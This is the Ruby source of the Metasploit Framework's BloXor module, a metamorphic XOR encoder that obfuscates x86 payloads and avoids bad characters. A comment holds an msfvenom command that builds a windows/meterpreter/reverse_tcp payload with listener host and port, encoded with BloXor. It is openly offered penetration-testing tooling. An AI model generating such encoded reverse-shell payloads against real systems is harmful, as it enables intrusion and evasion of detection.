GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/encoders/x86/bloxor.rb
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/encoder/bloxor/bloxor'

#
# BloXor is a cross architecture metamorphic block based xor encoder/decoder for Metasploit.
# BloXor was inspired by the Shikata Ga Nai encoder (./msf/modules/encoders/x86/shikata_ga_nai.rb)
# by spoonm and the Rex::Poly::Block (./msf/lib/rex/poly/block.rb) code by skape.
#
# Please refer to ./msf/lib/rex/encoder/bloxor/bloxor.rb for BloXor's implementation and to
# ./msf/lib/rex/poly/machine/machine.rb and ./msf/lib/rex/poly/machine/x86.rb for the
# backend metamorphic stuff.
#
# A presentation at AthCon 2012 by Dimitrios A. Glynos called 'Packing Heat!' discusses a
# metamorphic packer for PE executables and also uses METASM. I am unaware of any code having
# been publicly released for this, so am unable to compare implementations.
# http://census-labs.com/media/packing-heat.pdf
#
# Manually check the output with the following command:
# >ruby msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.2.2 LHOST=192.168.2.1 LPORT=80 -a x86 -e x86/bloxor -b '\x00' -f raw | ndisasm -b32 -k 128,1 -
#

class MetasploitModule < Rex::Encoder::BloXor

  # Note: Currently set to manual, bump it up to automatically get selected by the framework.
  # Note: BloXor by design is slow due to its exhaustive search for a solution.
  Rank = ManualRanking

  def initialize
    super(
      'Name'        => 'BloXor - A Metamorphic Block Based XOR Encoder',
      'Description' => 'A Metamorphic Block Based XOR Encoder.',
      'Author'      => [ 'sf' ],
      'Arch'        => ARCH_X86,
      'License'     => MSF_LICENSE,
      'EncoderType' => Msf::Encoder::Type::Unspecified
    )
  end

  def compute_decoder( state )
    # Build the x86 backend, passing the bad characters the decoder stub must avoid.
    @machine = Rex::Poly::MachineX86.new( state.badchars )

    super( state )
  end
end
```